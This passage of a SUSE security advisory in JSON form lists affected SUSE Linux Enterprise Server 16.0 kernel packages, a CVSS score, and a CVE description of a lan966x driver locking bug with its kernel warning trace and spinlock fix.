"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68297"
},
{
"cve": "CVE-2025-68320",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68320"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlan966x: Fix sleeping in atomic context\n\nThe following warning was seen when we try to connect using ssh to the device.\n\nBUG: sleeping function called from invalid context at kernel/locking/mutex.c:575\nin_atomic(): 1, irqs_disabled(): 0, non_block: 0, pid: 104, name: dropbear\npreempt_count: 1, expected: 0\nINFO: lockdep is turned off.\nCPU: 0 UID: 0 PID: 104 Comm: dropbear Tainted: G W 6.18.0-rc2-00399-g6f1ab1b109b9-dirty #530 NONE\nTainted: [W]=WARN\nHardware name: Generic DT based system\nCall trace:\n unwind_backtrace from show_stack+0x10/0x14\n show_stack from dump_stack_lvl+0x7c/0xac\n dump_stack_lvl from __might_resched+0x16c/0x2b0\n __might_resched from __mutex_lock+0x64/0xd34\n __mutex_lock from mutex_lock_nested+0x1c/0x24\n mutex_lock_nested from lan966x_stats_get+0x5c/0x558\n lan966x_stats_get from dev_get_stats+0x40/0x43c\n dev_get_stats from dev_seq_printf_stats+0x3c/0x184\n dev_seq_printf_stats from dev_seq_show+0x10/0x30\n dev_seq_show from seq_read_iter+0x350/0x4ec\n seq_read_iter from seq_read+0xfc/0x194\n seq_read from proc_reg_read+0xac/0x100\n proc_reg_read from vfs_read+0xb0/0x2b0\n vfs_read from ksys_read+0x6c/0xec\n ksys_read from ret_fast_syscall+0x0/0x1c\nException stack(0xf0b11fa8 to 0xf0b11ff0)\n1fa0: 00000001 00001000 00000008 be9048d8 00001000 00000001\n1fc0: 00000001 00001000 00000008 00000003 be905920 0000001e 00000000 00000001\n1fe0: 0005404c be9048c0 00018684 b6ec2cd8\n\nIt seems that we are using a mutex in a atomic context which is wrong.\nChange the mutex with a spinlock.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
